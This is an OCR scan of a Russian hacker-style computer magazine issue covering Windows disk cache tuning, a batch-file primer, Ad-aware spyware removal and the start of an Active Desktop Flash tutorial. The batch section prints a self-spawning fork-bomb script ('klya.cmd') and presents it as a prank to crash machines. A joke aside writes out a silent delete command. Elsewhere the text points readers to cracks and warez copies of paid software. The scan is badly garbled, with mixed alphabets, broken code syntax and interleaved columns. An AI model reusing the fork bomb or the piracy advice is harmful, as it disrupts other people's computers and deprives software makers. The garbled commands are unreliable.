то у приложений, и приходится его дина- 
мически уменьшать. По идее, грамотная 
реализация динамического изменения 
кэша должна быть лучше любой статиче- 
ской настройки, но на деле получается, 


Вот они - настройки 
для 9х и 2К/ХР в 
исполнении X-setup 
Окно настройки кэша 


то время он находился в оперативке, а 
потом что - исчез? Аесли он понадобится 
еще раз - нам его опять считывать? Ты 
должен уже почувствовать подвох и за- 
кричать: «Да не может такого быть! :). Ha 
самом деле файл должен сохраниться в 
специально отведенной части оператив- 
ки - дисковом кэше. Кэш использовали 
еще в старые ДОСовские времена - за- 
гружали в оперативку FAT, пробовали ис- 


что винда отводит слишком мало места 
под кэш в системе, где много памяти, и 
слишком мало в системе, где памяти нет. 
Следовательно, оптимальные настройки 
придется искать самим. 


+- CACHESIZE = 2 -+ 


Отчего же зависит размер необходи- = 
мого кэша? Ну, во-первых, от физи- — 
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| | | ческого размера оперативной па- 
мяти, причем здесь зависимость почти 
линейная. Во-вторых, от скорости диско- 
вых интерфейсов, ведь чем медленнее 
доступ к диску, тем больше будет выиг- 
рыш от использования кэша (хотя для до- 
машних компов данный пункт не столь ак- 
туален). А в-третьих - от профиля систе- 
мы (загрузка памяти, характер дисковых 
операций). Третий параметр почти все- 
гда является определяющим и - что хуже 
- трудно измеряемым. Самое простое - 
вычислять размер кэша по остаточному 
принципу, как предлагал Дронич не- 
сколько номеров назад. Не самый хоро- 
ший способ, если честно (так, все, надо- 
ел - del ..\kirion\zarplata\*.$$$ >NUL - 
прим. Дронича). В таком случае кэша, 
скорее всего, не будет достаточно. Мож- 
но использовать часто предлагаемые на- 
стройки: кэш равен четверти от опера- 
тивки. Для среднестатистической систе- 
мы (немного гамаюсь, немного печатаю, 
слушаю музыку, запущен Delphi, болтаю 
по аське, причем все одновременно :)) с 
128-256 метрами оперативки (типа наи- 
более распространено) это будет весьма 
неплохо. Но лучше всего протестить по- 
казания двух параметров при типичной 
нагрузке на систему: использование кэ- 
ша и количество удачных обращений к 
кэшу (то есть обращались и нашли, что 
хотели). Я в свое время пользовался мо- 
нитором, входящим в поставку Norton 
Utilites (System Doctor, если не ошиба- 
юсь). Соответствующие показатели там 
назывались «Cache usage» и «Cache hits». 
В своей системе я добился того, что оба 
показателя колебались в пределах 95- 
99%, а потом с удивлением обнаружил, 
что настройки получились почти дефолт- 
ные :). Отсюда мораль: не хочешь возить- 
ся - ставь кэш на четверть от оперативки 
и не парься. Но на этом количественные 
вопросы не заканчиваются. На очереди: 
должен ли минимальный кэш равняться 
максимальному? Я считаю, что должен! 
Но не всегда :). Если у тебя 32 мега опе- 
ративы или меньше (бедненький ты мой 
юзер :)), то имеет смысл поставить мини- 
мум кэша на 2 мега, иначе могут наблю- 
даться проблемы со свободной памятью. 
Еще неплохо определить размер блока. 
Тоже важный параметр: слишком ма- 
ленький размер замедлит работу, слиш- 
ком большой приведет к быстрому пере- 
полнению кэша. По дефолту эта настрой- 
ка равна 512, но это для 64 мегов. Для 32- 
х смело ставь 256 и так далее. Максиму- 
мом же является где-то 2048 для 256 ме- 
гов (хотя у многих стоит 1024, тут тоже 
можно экспериментировать :)). Кстати, 
все предыдущие настройки являются 
степенью числа 2. В принципе это не обя- 
зательно, но лучше ставь так, а то мало 
ли... Осталось всего два параметра - 
NameCache и DirectoryCache. 
NameCache - винды кэшируют еще и 
имена файлов. Число кратно 512. Для 64 
мегов будет где-то 1024, больше 3072 
ставить не нужно, если только ты не дер- 
жишь файловый сервак у себя на компе. 
DirectoryCache - кэш директорий, как 
можно догадаться. Число кратно 16 и 
приблизительно равно оперативке, то 


ДИСКОВАЯ НАЛИЧКА 


есть при 32 мегах - 32 ит.д. Делать боль- 
ше 128-и тоже не имеет особого смысла. 
Посчитал? Молодца, теперь разберем, 
как все эти настройки применить. 


ГЫ А САСНЕМАН BABY 


На самом деле кое-что ты можешь сде- 
лать, даже не залезая в конфиги. Идем в 
Панель управления/Система/Быстродей- 
ствие/Файловая система и в опции «Ти- 
пичная роль компьютера» выбираем сер- 
вер сети. Мало, конечно, но уже кое-что. 
Далее лезем в system.ini и ищем раздел 
[vcache] (если такого нет - смело созда- 
вай). Пишем по очереди minfilecache=, 
maxfilecache=, chunksize=, namecache=, 
directorycache=, естественно - все Ha OT- 
дельных строках и без запятых. И не 3a- 
будь прописать свои величины :). Но все- 
таки это не очень удобно - писать все руч- 
ками, да и слегка стремно - вдруг чего за- 
был или не так написал. Будем пользовать 
твикер. Кое-что в этом деле может сде- 
лать такой монстр, как X-teq Systems Х- 
setup (www.x-teg.com). Если ты с ним ког- 
да-нибудь работал, то знаешь, что наст- 
роек там очень много и главная задача - 
найти нужные через поиск. Там все пин- 
цетно, но все-таки для таких дотошных 
перцев, как мы, - маловато :). 


Самым продвинутым в плане работы с 
кэшем является, безусловно, Cacheman 
(www.outertech.com, там, кстати, есть и 
другие разработки этой конторы). Теку- 
щая версия проги - 5.11. Прога шаровар- 
ная, но немного странная: стоит у меня 
уже месяца два с последнего сноса сис- 
темы и не орет. Хотя если заорет - дай ей 


соску от асталависты :). Настроек в ней 
довольно много, кроме дискового кэша 
есть кэш сидюка, настройка упреждаю- 
щего чтения, кэш иконок, очистка опера- 
тивной памяти. Прога легко помещается 
на дискетку и спокойно живет в трее. 

По каждому пункту есть визарды, для на- 
чала можно и воспользоваться, но лучше 
почитать хелпу и сделать все самому. 
Есть также набор профилей по умолча- 
нию, хотя тоже не фонтан, зато на любой 
вкус :). Единственный, если не главный 
минус саспетап’а - nog, win2k/XP из наст- 
роек кэша остается только убогая ме- 
нюшка с четырьмя пунктами :(. Малень- 
ким утешением могут служить специфи- 
ческие настройки этих систем, появляю- 
щиеся взамен. Разработчики, ау! Выпус- 
кайте уже, наконец, версию для ХР. Для 
тех, кто, как и я, ждет этого, могу посове- 
товать уже упомянутый X-setup или 
TweakxP, в ней тоже есть блок настройки 
кэша, но более слабый по возможностям. 


ANbTEPHATHBA 


Все вышесказанное является хорошо про- 
веренным на собственном опыте, но во- 
все не единственным мнением. Не могу 
удержаться и дам линк на одну статейку, с 
которой я категорически не согласен, но, 
тем не менее, она имеет право на сущест- 
вование: www.computery.ru/upgrade/ 
numbers/2002/045/mem_45.htm. Само ee 
существование доказывает, что сколько 
людей - столько и мнений, и тебе самому 
решать, кто будет вешать тебе лапшу на 
уши. И помни, что оптимизатор - OH какхи- 


рург, главное - не навредить :). Удачи! 
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Программки, утилитки, 


Console 


оптимизаторы... Слащавенько получается, 


ребятки! Ведь’винтукей замечателен нетолько повышенной 
стабильностью И‘нормальной многозадачностью, но и практически 


полноценной консолью. Ах 
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ю-то мы с-тобой. и. займемся, — = 

вспомнив дедушку ДОСа. Ну hn BbIBOW 

юниксоидам HOC слегка утрем - 
типа, мы тоже не лаптем щи хлебаем, 
не все нам мышой клацать :). 


Самые простые операторы - операто- 
ры вывода. В батниках для этого ис- 
пользуется команда «еспо». Для выво- 
да на экран строки «Куа is a greatest 
DUM» в СМО-файле надо прописать: 
echo Klya is a greatest DUM 

Только BOT незадача - батники дубли- 
руют выполняемые команды, чтобы ты 
видел, чего, собственно, у них внутри 


Юзать консоль для запуска прог - чи- 
стейшей воды моветон. Мы займем- 
ся составлением полезных команд- 
ных файлов, по традиции зовущихся 
батниками (хотя на смену «.bat» дав- 
но пришел «.cmd»). Для начала надо 


Пзык команднын файлов состоит из двун Больших частей: выполняемые 
команды и системные метки. Наждой из выполняемын команд соответствует 


C:\WINNT\system32\Find.exe), метки же просто распознаются системой в 


контексте ватника (циклы, условные операторы). Можно сказать, что команд 


вооБще не существует :], просто средствами языка вызываются нужные 
программы. Так оно и есть, но поскольку круг чисто служевныя прог ограничен 
(He Будешь же ты запускать тот же sleep не из ватника), оБзовем ин командами. 


освоить самые простые операторы, 
чем мы сегодня и займемся. По- 
скольку в языке написания ста’шек 
многое осталось неизменным со вре- 
мен ДОСа, подробно будем рассмат- 
ривать только нововведения, а по ос- 
тальному пробежимся для освежева- 
ния мозгов :). 


творится. В нашем случае вместо од- 
ной строки на экране появится: 

echo Klya is а greatest DUM 

Klya is a greatest DUM 

Бороться с дублированием можно по- 
разному: для отключения вывода од- 
ной команды перед ней ставится «@», 
для отключения всех последующих на- 
до дать команду «echo off». Так как 


обычно дублирующий вывод никому не 
нужен, в начале файла прописывают: 
@echo off 

Эта строка отключает дальнейший вы- 
вод и в придачу скрывает сама себя. 


Условный оператор, как и следовало 
ожидать, обзывается IF’OM и имеет та- 
кой формат: 

if [строка] [условие сравнения] 
[строка] [команда] 

В качестве условий сравнения строк 
применимы такие сокращения: EQU - 
равно, МЕС - не равно, LSS - меньше, 
GTR - больше, LEQ - меньше или равно, 
GEQ - больше или равно. Если сразу 
после IF поставить ключ /i, сравнялке 
будет наплевать на регистр строк (то 
есть А=а, B=b ит.д.). 

Существуют еще два подвида услов- 
ных операторов: «if errorlevel [индекс 
ошибки]» и «if exists [имя файла]». 
Первый нужен для обработки критиче- 
ских ситуаций (выяснить, что за ошиб- 
ка произошла). Во времена ДОСа это 
условие реально пользовали только 
для проверки файла на существова- 
ние. Вуаля - к 2000 году Билли услышал 
наши молитвы и ввел новый подвид 
IF’a - «if exists», который только и дела- 
ет, что проверяет существование фай- 
ла. Лучше поздно, чем никогда :). 
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Для вызова других командных файлов в 
батниках можно использовать аж три 
команды. Во-первых, можно просто на- 
писать имя другого батника в строке. 
При таком вызове выполнение текуще- 
го завершится, а вызванный пойдет на 
исполнение. Во-вторых, можно вызвать 
батник командой «call [имя батника]». 
Тогда выполнение текущего СМО-фай- 
ла приостановится до завершения ра- 
боты вызванного, а потом снова возоб- 
новится. И, наконец, в-третьих, другой 
батник или просто команду можно за- 
пустить на выполнение ‘параллельно с 
текущим командой «start [заголовок 
окна] [имя батника\команды}». Тогда 
новый скрипт откроется в новом окне 
(кстати, если добавить к команде пара- 
метр /май, то текущий батник будет 
ждать завершения вызванного). 


METKH 


Куда ж без них! Сколько нам твердили, 
что программирование с СОТО - от- 
стой... Здесь г. Гейтс не оставляет нам 
шансов на альтернативу, придется 
юзать. Метки оформляются так: 
:metka 

goto metka 
Любую метку можно вызвать командой 
сай, делается это так: 

call :те а 
Тогда весь текст батника от метки и до 
конца будет считаться новым батником 
:). Заморочено, но удобно. 

Настоящие программисты не любят 
метки, потому что из-за них может воз- 
никнуть недетское зацикливание. Но 
именно поэтому метки нравятся нам - 
западлостроителям. Самое простей- 
шее зло на командном языке выглядит 
примерно так: 

——klya.cmd—— 

@echo off 

:dr 

start klya.cmd 

goto dr 

——klya.cmd—— 


Этот зло-скриптик будет заниматься 
вызовом самого себя бесконечное 
число раз. Причем каждый вызванный 
им экземпляр будет заниматься тем 
же. Скорость ухода тачки в даун зави- 
сит только от ее мощности. До скорого 
ребута! 


ПАРЯТЕТРЫ 


Помнят ли потомки ДОСа славное на- 
чинание по передаче аргументов пря- 
мо из командной строки? Помнят, да 
еще как. Начиная с НТшки, аргументы 
можно делить на части и преобразовы- 
вать, не отходя от кассы. Обращения к 
параметрам проходят вот так: 


%1 - просто первый аргумент 

%* - все аргументы 

%=1=-„первый аргумент с удалением 
кавычек («колбаса» > колбаса) 


Остальные параметры действуют, если 
только батнику передается имя файла 
(вызов типа Куа.ста dr.txt). 


%-11 - абсолютный путь к файлу 

%~d1 - имя диска 

%-р1 - имя каталога 

%-п1 - имя файла (klya.txt > klya) 

%-х1 - расширение файла (klya.txt > txt) 
%-а1 - атрибуты файла 

%~t1 - дата и время создания файла 
%~s1 - размер файла 


Все параметры комбинируются без 
проблем: %~dpnxs1 выдаст поделен- 
ный на части путь к файлу и его размер, 
ит. п. 


ПОПЕЗНЫН ПРИМЕР 


Так как теория лучше всего познается 
на практике, попробуем написать не- 
большой файлик, который будет... Ну, 
скажем, будем помещать копии файла 
во все подкаталоги текущего каталога. 
Типа ты админ и раздаешь всем поль- 
зователям новые правила работы :). 
Подобный файл разбирается на 
microsoft.com, но его можно несколько 
улучшить. В нем будут присутствовать 


циклы, в следующий раз мы разберем 
их подробнее, а пока постарайся разо- 
браться в том, что есть. Наш батник бу- 
дет вызываться Tak: admin rules.txt sub- 
dir. Если не указано имя директории, 
будем работать в текущей. 

@echo off 

rem Это комментарии :) 

if (%1)==() goto :bad 

if (%2)==() goto :сигат 

rem Проверяем, заданы ли параметры 
в командной строке. Если нет файла, 
сваливаем на :bad. 

for /Е «skip=7 tokens=4» %%a т (‘dir 
%2 /ad’) do call :copyall %%a %1 %2 
rem Этот дикий цикл означает: из выво- 
да команды «dir %2 /ad» выдирать сло- 
ва после четвертого знака табуляции 
(это будут имена), класть их в перемен- 
ную %%a и передавать подпроцедуре 
«соруа!». При этом первые семь строк 
вывода надо пропустить (там идет слу- 
жебная инфа). 

goto :eof 

:curdir 

for /F «skip=7 tokens=4» %%a in (‘dir 
/ad’) do call :copyall %%a %1 . 

rem Тот же цикл, но мы He заморачива- 
емся с именем директории, считая ее 
текущей. 

goto :eof 

rem Ниже идет подпроцедура. В ней 
мы проверяем переданные имена ди- 
ректорий (не пустые ли), а также отсе- 
иваем строки «столько-то bytes free». 
Затем выполняется процедура копиро- 
вания файла (второй параметр для 
этой подпроцедуры) в поддиректорию 
заданной директории (первый и третий 
параметры). 

:copyall 

if (%1)==() goto :eof 

if (%1)==(bytes) :eof 

copy %2 %3\%1 

goto :eof 


:Баа 

echo А чего копируем-то? 

goto :eof 

Простенько и почти бесполезно :). В 
следующий раз мы займемся чем-ни- 
будь посложнее. Жду пожеланий и ком- 


ментов на мыле! 


=r 
oil, 


ексей Б. Беляев (alexey@spez.fatal.ru) 


БОРЬБА 


CO ШПИОНАМИ . 


Почему все без разбора суют нос в нашу личную жизнь? Ладно еще 
братья-хакеры, их настойчивым попыткам заграбастать пароли и 
инфу по кредитке мы противопоставляем хорошие файрволы, 
криптозащиту и быстрые контратаки :). 


о уж корпорации, собирающие ин- 

фу о наших пристрастиях с нашего 

же компа, - это форменное безоб- 
разие! Будем бороться. 


ПРИЧИНА ПРОИСХОЖДЕНИЯ 
ШПИОНОВ 

Небольшому использованию ТВОЕГО 
трафика без ТВОЕГО непосредствен- 
ного участия должно предшествовать 
полное и правдивое описание цели 
этого использования (в виде аккурат- 
ного виндового окошка). А решать, да- 
вать или нет этот трафик, - твое дело. 
Поэтому любая прога, передающая че- 


все негласно. В наши дни многим инте- 
ресно, кто ты есть на самом деле. И вот 
в чем дело. Рекламе в Интернете уде- 
ляется много внимания, и на нее тра- 
тятся большие деньги. Сейчас ее эф- 
фективность можно повысить только 
путем изучения интересов пользовате- 
лей сети. Различные опросы не прино- 
сят большой пользы, да и время поль- 
зователей отнимают (ты часто заполня- 
ешь эти гребанные попап-анкеты?). А 
для целенаправленного таргетинга 
рекламы нужно знать интересы каждо- 
го (!) индивидуума. Поэтому рекламщи- 
кам необходимо получить как можно 


Стоит задуматься о наличии эрушаге на своей машине, если: 
1) ты поставил сеБе довольно популярный “ускоритель Интернета”, а скорость 
передачи данных после этого почему-то стала медленнее; 


имени обращаются. 


рез Интернет данные без твоего согла- 
сия, виновна в информационной краже, 
и один из видов таких программ по пра- 
ву назвали «шпионами» (Spyware). 

Пока спонсорство является основным 
способом для продвижения бесплат- 
ных продуктов, некоторые из этих про- 
грамм делают больше, чем показывают 
обычные статические баннеры, они ис- 
пользуют твой трафик для загрузки но- 
вых баннеров некоторых контор и для 
передачи различной информации о те- 
бе. Эта информация продается впос- 
ледствии этим самым «некоторым кон- 
торам». Большое желание получить 
нужную информацию о личных прист- 
растиях человека заставляет делать 


070 


больше информации именно о тебе. 
Можешь, конечно, и сам все им расска- 
зать, но сомневаюсь, что таких, как ты, 
много :). Это и стало причиной появле- 
ния различных шпионских программ 
(различных Gator’os, WebHancer’os и 
пе 


МЕТОДЫ РАСПРОСТРАНЕНИЯ 
ШПИОНОВ 

Навряд ли тебе захочется добровольно 
ставить шпионов на свою машину и 
держать их. Поэтому устанавливаются 
они без твоего ведома, да и работа их 
всячески скрывается, дабы ты не заме- 
тил их присутствия и, не дай бог, не 
удалил. 


Из-за скрытной работы данных про- 
грамм их еще называют «рекламными 
троянами». Эти системы зачастую ус- 
танавливаются с популярными про- 
граммами (качалками, peer2peer кли- 
ентами и прочими прогами, активно 
хавающими трафик), а работают уже 
впоследствии сами по себе. Некото- 
рые из них подключают себя к броузе- 
ру, некоторые становятся просто неви- 
димыми. 

Если ты ставил себе программы типа 
GetRight’a, GoZill’b! или FlashGet’a, то 
тебя можно поздравить - на твоем ком- 
пе наверняка есть шпионы. Указанные 
выше проги спонсируются за счет рек- 
ламы, поэтому они и ставят к тебе на 
машину следящие аплеты, которые уп- 
равляют размещением рекламы и пе- 
редают данные о твоих пристрастиях 
кому надо. Даже если удалить софт, то 
шпионы останутся в надежно спрятан- 
ных местах и будут продолжать переда- 
вать инфу о тебе. Вот и получается, что 
бесплатные проги не такие уж и бес- 
платные, за них приходится платить ог- 
лашением сведений о тебе, а также 
снижением скорости Инета и использо- 
ванием ресурсов компьютера. А Tak как 
шпионы - это не трояны, то здесь и Ка- 
сперский с доктором Вебом бессильны 
в борьбе с ними. Поэтому трудной за- 
дачей оказывается не только удаление 
шпионов, но и их обнаружение. Но не 
все так плохо, как кажется на первый 
взгляд. Даже шпионов можно просле- 
дить, и вот как это делается. 


ОБНАРУЖЕНИЕ ШПИОНОВ 
Стоит задуматься о наличии шпионов, 
если: 

1) ты поставил себе довольно популяр- 
ный «ускоритель Интернета», а ско- 
рость передачи данных после этого 
почему-то стала медленнее; 
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ИИ 2) непонятные приложения веч- 
но коннектятся к удаленному серверу, а 
проверка антивирусом показывает, что 
никаких троянов у тебя и нету; 

3) почтовый ящик заваливают кучами 
спама, а в спам-письмах к тебе даже по 
имени обращаются. 

Если все так и есть, то ты наверняка 
поймал рекламного паразита, который 
теперь вовсю работает. Но эти наблю- 
дения не дают 100% гарантии обнару- 
жения. 

Почти все без исключения шпионы на- 
меренно прячутся вглубь компьютера и 
работают в режимах, позволяющих из- 
бежать возможного обнаружения. К 
примеру, шпионская система Aureate 
снижает скорость передачи данных при 
отсутствии активности пользователя, 
чтобы тот не заметил мигание лампо- 
чек на модеме и не задумался, что же 
передается в тот момент, пока он ниче- 
го не делает. С тех пор, как создатели 
прог-шпионов стали стремиться к ми- 
нимальной вероятности их обнаруже- 
ния, появился спрос на специальные 
средства для охоты на них. К таким 
средствам относятся два типа про- 
грамм: 

- файрвол (Zone Alarm, Outpost); 

- специальные утилиты (снифферы) для 
контроля интернетовских соединений. 
Пользуясь файрволом, нужно включить 
либо запрос на разрешение соедине- 
ния незнакомым программам (в таком 


1, Внешний вид программы 
Ad-aware 


2, Меню настроек Ad-aware 


случае ты сможешь обнаружить новых 
шпионов по сообщению файрвола), ли- 
бо разрешить соединения только нуж- 
ным приложениям, а все остальные - 
блокировать (имхо, не решает пробле- 
My - а что, если через некоторое время 
шпионский модуль начнут включать 
прямо в код фриварной проги? Нужен 
файрвол, который умеет фильтровать 
по таким параметрам, как хост/порт на- 
значения, протокол и т.д. - прим. ред..). 
В том и в другом случае никакие гады 
не сделают своих грязных дел. 

Если ты не боишься оказаться в таких 
дебрях, где что к чему известно только 
твоему процессору, или если ты реаль- 
но хочешь знать, что происходит с сис- 
темой, когда ты юзаешь Инет, то тогда 
понадобится утила для снифания паке- 
тов. Такая прога сможет мониторить 
все запущенные процессы и выдавать 
отчеты об их соединениях. 


AD-AWARE - СРЕДСТВО 
ИЗБАВЛЕНИЕ O ПИОНОВ 
Что делать, если на компе уже уста- 
новлены шпионы? Они ведь расходу- 
ют не только сетевой трафик, но и ре- 
сурсы твоего компа. Для проверки на- 


БОРЬБА СО ШПИОНАМИ 
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личия шпионов или для того, чтобы 
убедиться в обратном, компанией 
LavaSoft (http://www.lavasoftusa.com) 
была выпущена программа Ad-aware. 
Ad-aware - бесплатная утилита для 
массового уничтожения «шпионов», 
работает под всеми ОС Windows 
(Win9x, WinMe, Win2k, WinXP). Так что 
лезь Ha сайт и качай. Зачем? Скани- 
руя все диски и реестр, она находит 
шпионов, проверяя их по заготов- — 
ленной базе данных (которая по- —— 


| стоянно пополняется) и удаля- 
ет их. 

Посмотрим, как воспользоваться Ad- 
aware так, чтобы комп стал почище, а 
система продолжала функционировать 
без глюков. 
Разработчики этой софтины полностью 
обезопасили процесс удаления шпио- 
нов. В версиях Ad-aware старше 5.82 
можно (нужно!) делать резервную ко- 
пию перед удалением и при желании 
возвращать все на место. Ведь после 
исчезновения шпионов, которые встро- 
ены в нужные тебе программы, послед- 
ние запросто могут перестать рабо- 
тать. 
После запуска Ad-aware надо выбрать в 
меню слева области сканирования. Так 
как в памяти компа уже могут быть за- 
пущены шпионы, то рекомендую вы- 
брать и сканирование памяти, которое 
не займет много времени даже на сла- 
бых машинах. Затем нажми на кнопку 
Scan, «откинься на спинку кресла» и на- 
блюдай за работой программы :). По- 
сле сканирования прогой будет пред- 
ставлен отчет с указанием количества 
шпионов и мест их дислокации или ра- 
достной вестью об отсутствии таковых. 
Отчет представляет собой таблицу из 
трех полей. В первом поле указывается 
тип шпиона (М - модуль, К - ключ реес- 
тра, V - значение ключа реестра, F - 
папка). Следующее поле содержит на- 
звание системы, к которой относится 
приложение. Третье поле оставлено 
под детали о каждой находке (располо- 
жение приложения, значение ключа ре- 
естра ит.п.). 
На этом этапе можно просмотреть и со- 
хранить логи в текстовом файле для 
изучения работы шпионов. Здесь тебе 
решать, каких шпионов убить, а каких 
оставить. Но лучше с криком «Мочи их 
всех!» нажать на Continue и очистить 
свой комп. 
В случае, если после удаления шпио- 
нов что-то перестало работать или по- 
явились ошибки в работе, которые ра- 
нее не наблюдались, то в любой мо- 


мент можно восстановить исходное 
состояние. Для этого нужно будет за- 
лезть в тот же пункт Backups и выбрать 
нужную резервную копию, которая ав- 
томатически создается при удалении 
найденных шпионов. 


НАСТРОЙКА «ПОД СЕБЯ» 


Ad-aware изначально нормально наст- 
роена на удаление шпионов, но для бо- 
лее продвинутых пользователей (к ко- 
им ты, безусловно, относишься) суще- 
ствует возможность изменения стан- 
дартных настроек. Для попадания в ме- 
ню настроек нужно просто нажать кноп- 
ку Customize Ad-aware. 

Рассмотрим назначение всех менюшек 
по очереди. 


General Options 

Здесь меняются основные настройки 
Ad-aware. Перед тобой шесть пунктов: 
1) Mark all references by default: если ус- 
тановлено, то все найденные при ска- 
нировании шпионы будут выделяться 
для удаления. Хотя при этом можно и 
отменить выделение вручную. 

2) Scan on Windows startup: для ленивых 
- Ad-aware будет автоматически запус- 
каться сразу после загрузки виндов 
(аналогично прописыванию в автоза- 
грузке, но при этом будет происходить 
сканирование указанных объектов). 

3) Safe mode (always ask confirmation): 
выдели этот пункт, если хочется NOCTO- 
янно получать вопрос от Ad-aware на 
выполнение любого ее действия. Сда- 
ется мне, что сделано это для тех, кто 
впервые юзает данный софт и до сих 
пор не прочитал RTFM к нему (а смогут 
ли они сами найти способ добраться до 
этой галочки - не наше дело :)). 

4) Automatically remove а! references 
found: не стоит использовать, если тебе 
не хочется отправить всех шпионов, ко- 
торых ad-aware посчитает таковыми, 
куда подальше без вопросов. Если га- 
лочка у этого пункта стоит, то все обна- 
руженные шпионы будут автоматичес- 


ки удаляться, а все действия програм- 
мы будут записываться в |09-файл. 

5) Auto save log file: опция для желаю- 
щих всегда иметь сохраненный log- 
файл после работы Ad-aware. Даже ес- 
ли не найдется шпионов, новый 109- 
файл все равно будет создан. 

6) Language: захотелось сменить язык 
работы Ad-aware? При запуске проис- 
ходит проверка на наличие папки с язы- 
ками (...Ad-aware\Lang), которая долж- 
на содержать языковые модули. При 
желании заменить язык появится вы- 
бор, какой ставить. Русского модуля 
пока нет, так что любителям великого и 
могучего придется заняться переводом 
самим. 


Additional Options 

Для особо требовательных граждан со- 
здана версия Ad-aware plus, где добав- 
лено несколько дополнительных наст- 
роек. Апгрейд до «плюса» проходит 
элементарно, достаточно одного нажа- 
тия на кнопку «Upgrade to Ad-aware 
plus», и 15 баков... Но, имхо, это не наш 
метод. Тем более, что Ad-aware 5.83 
plus в изобилии валяется на варезных 
сайтах :). Если напряжешься и добу- 
дешь расширенную версию, то полу- 
чишь еще шесть полезных опций: 

1) Add «Scan with Ad-aware» to explorer 
context menu: добавляет «Scan with Ad- 
aware» в меню правой кнопки для па- 
пок. 

2) Automatically remove files in use after 
rebooting: с появлением этой галки за- 
пущенные в данный момент шпионы бу- 
дут удаляться после ребута системы 
без повторного запуска Ad-aware и ска- 
нирования. Уже ради этого стоит устро- 
ить апгрейд. 

3) Hide splashcreen at startup: тут все 
понятно - отключение логотипа при 3a- 
пуске Ad-aware. 

4) Play alarm sound if spyware was found: 
при обнаружении шпиона комп истош- 
но завопит, WAV для вопля можно вы- 
брать. 


5) Indlude additional process information: 
показывает детали о запущенных шпи- 
онах, например, когда он появился или 
его приоритет. 

6) Include additional file information: по- 
казывает дополнительные описания 
файлов шпионов. 


АЛЬНЕЙШАЯ 
РОФИЛАКТИКА 


Если Ad-aware у тебя уже установлен, 
а тебе захотелось поюзать свежеска- 
чанный софт, то рекомендуется запус- 
тить Ad-aware параллельно с инстал- 
лятором. В таком случае, если будет 
попытка в нагрузку установить бес- 
платные шпионские приложения :), ты 
сможешь в реальном времени полу- 
чить инфу о шпионе, который хотел ус- 
тановиться, и заинсталлить только 
нужную программу. 

Не забывай про апдейты! Число шпио- 
нов растет с каждым днем. Lavasoft то- 
же не дремлет и пополняет шпионскую 
базу. Периодически залезай на 
http://www. [ауазоНиза.сот/4омпт- 


loads.html wv качай пополнения базы. 


АЛЬТЕРНАТИВНЫЕ 
МЕТОДЫ БОРЬБЫ 


Кроме описанной выше Ad-aware, су- 
ществует несколько программ для бло- 
кирования деятельности шпионов. O3- 
накомься с топ-листом программ, ре- 
ально помогающих при решении нашей 
задачи: 
1) Spychecker: благодаря ей ты смо- 
жешь обнаруживать шпионов до скачи- 
вания. Способна — обнаруживать: 
Aureate/Radiate, Web3000, 
Conducent/TimeSink, Cydoor и многие 
другие. Скачать Spychecker можно с 
сайта http://www.spychecker.com. 
2) ZoneAlarm: очень хороший халяв- 
ный файрвол, но его назначением явля- 
ется не борьба со шпионами, а кон- 
троль за соединениями и блокирование 
нежелательных коннектов. Но если 
шпион встроен в какую-то прогу (а не 
запускается отдельно), придется ма- 
яться с правами доступа для этой проги 
(вычислить айпишник сервера реклам- 
щиков и запретить его). Разок грамотно 
настрой ZA и юзай Инет в свое удоволь- 
ствие, не опасаясь ни за шпионов, ни за 
троянов, ни за ньюкеров. Программу и 
ее описание смотри на сайте 
http://www.zonelabs.com. 


ДИСКОВАЯ НАЛИЧКА 


3) Silencer не убивает шпионов, a не 
дает им коннектиться к серверу сбора 
информации. Для этого Silencer пере- 
направляет все адреса серваков на 
127.0.0.1 (ну или Localhost, если так 
привычнее). Не используй эту прогу на 
компах, объединенных в локальную 
сеть. 

4) Aureate/Radiate Remover: офици- 
альная прога, сделанная теми же ребя- 
Tamu из Radiate, которые сотворили од- 
ноименный шпион. Она удалит все биб- 
лиотеки Radiate’a с компа, после чего 
Radiate’oBckue шпионы перестанут ра- 
ботать. Заинтересовавшимся сюда 
http://www. radiate.com/privacy 
remover. html 


Хорошо, когда есть выбор, но стоит 
выбрать одну надежную программу 
и ею пользоваться. Рекомендую 
все-таки воспользоваться Ad-aware, 
ибо более надежной и быстрой про- 
граммы, которая полностью избав- 
ляет от шпионов, еще не попада- 
лось. После ее запуска с моего ком- 
па было удалено 23 шпиона. Хотя 
они и не могли ни к чему коннектить- 
ся (файрвол рулит!), но скорость ра- 
боты системы в целом заметно уве- 


личилась. 
=r 
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от скажи мне, приятель, как на ду- 
ху, что натянуто на твой десктоп? 
Фотография любимой бензопилы 
по кличке “Кастратор”? Или, может 
быть, там тусуются приятные глазу объ- 
емистые формы Памелы Андерсон? 
Или ты крутой хаксор, и десктопы тебя 
всякие вообще не интересуют, поэтому 
твой монитор щеголяет дефолтовым го- 
лубеньким цветом? Во всяком случае, я 
подозреваю, что Active Desktop у тебя 
отключен наглухо и никогда и не вклю- 
чался. Нуеще бы - все вокруг в один го- 
лос орут, что Active Desktop - это отстой 
полный, жрет ресурсы, тормозит маши- 
ну и пользы от него, как от козла моло- 
ка... Так вот, все, кто так орет, - имхо - 
ламосы полные, обделенные фантазией 
и неспособные мыслить широко и глу- 
боко :)! Естественно, если включить 
Active Desktop и оставить на нем все как 
есть, то никакой пользы от него и не бу- 
дет, но ведь, блин, зачем нам руки да- 
ны? Только представь, что можно наво- 
ротить со своим десктопом, учитывая 
то, что на рабочий стол с включенным 
Active Desktop’OM можно натянуть лю- 
бую html’ ky!!! Комбинируя хтмл, flash, 
JavaScript и прочие меб-примочки, 
можно замутить себе такой интерфейс, 
что все, кто его увидит, будут просто па- 
дать в обморок от зависти и восхище- 
ния! Только представь себе интерактив- 
ную флеш-менюху в верхнем правом уг- 
лу десктопа, из которой можно вызвать 
любую прогу (виндовая кнопенция Start 
просто отдыхает). Представь себе деск- 
топ, на котором все элементы будут ди- 
намически двигаться, представь па- 
нельки, которые будут выдвигаться и 
захлопываться при наведении мышки, 
представь эффекты капель воды, тума- 
на, морфинг объектов прямо на рабо- 
чем столе! А если еще поставить на ма- 
шину интерпретатор Реп, то тут уже 
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Все это мы с тобой проделаем (начи- 
ная с этого номера), а пока давай нач- 
нем с малого и сделаем твой Рабочий 
стол чуть более симпатичным и интер- 
активным, повесив на него элементар- 
ную флешовую напоминалку. Ок? Тогда 
грузи Flash :). Я надеюсь, ты слегка 3Ha- 
ком с этой чудо-программой, поэтому 
быстро разберешься, что кчему ;). 


Первым делом выбираешь в меню Мо- 
дификация/Видеофрагмент 
(Modify/Movie или просто Ctrl+M) и ус- 
танавливаешь цвет фона - черный и 
размеры мувика - 500 (ширина) на 120 
(высота) пикселей. Жми “Ok”. Видишь 
